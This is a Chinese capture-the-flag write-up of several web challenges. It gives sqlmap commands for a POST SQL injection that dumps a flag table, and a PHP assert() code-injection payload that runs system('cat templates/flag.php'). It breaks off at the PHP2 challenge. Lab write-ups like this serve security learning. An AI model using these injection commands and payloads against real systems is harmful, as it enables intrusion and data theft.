0x01 ics-06
查看源码发现:index.php
一开始直接用sqlmap跑了下没有发现注入,然后用brupsuite爆破参数
0x02 NewsCenter
SQL注入中的POST注入,查阅资料(下方链接)获知注入方法!
python2 sqlmap.py -r post.txt
可以获得如下信息:
- mysql 5 数据库
- Linux Debian9.0的服务器系统
- Apache 2.4.25的
接着来查看该数据库的表:python2 sqlmap.py -r post.txt --dbs
python2 sqlmap.py -r post.txt -D "news" -T "secret_table" --columns
python2 sqlmap.py -r post.txt -D "news" -T "secret_table" -C "fl4g,id" --dump
0x03 mfw
没有发现注入点,扫一波目录看看
在templates目录下发现:
//flag.php
<?php
// TODO
// $FLAG = '';
?>
//index.php
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
assert
以及stroops
的具体用法百度可知,要使得第一个assert
检查第一个断言为False
payload
yoloyanng')or system("cat templates/flag.php");//
$file="templates/yoloyanng')or system("cat templates/flag.php");//.php";
最后执行的就是:
assert("strpos('templates/yoloyanng') or system("cat templates/flag.php");//, '..') === false") or die("Detected hacking attempt!");
最后执行语句:
strpos('templates/yoloyanng') or system("cat templates/flag.php")
0x04 PHP2
首先扫目录也没扫出什么东西来,后来得知是index.phps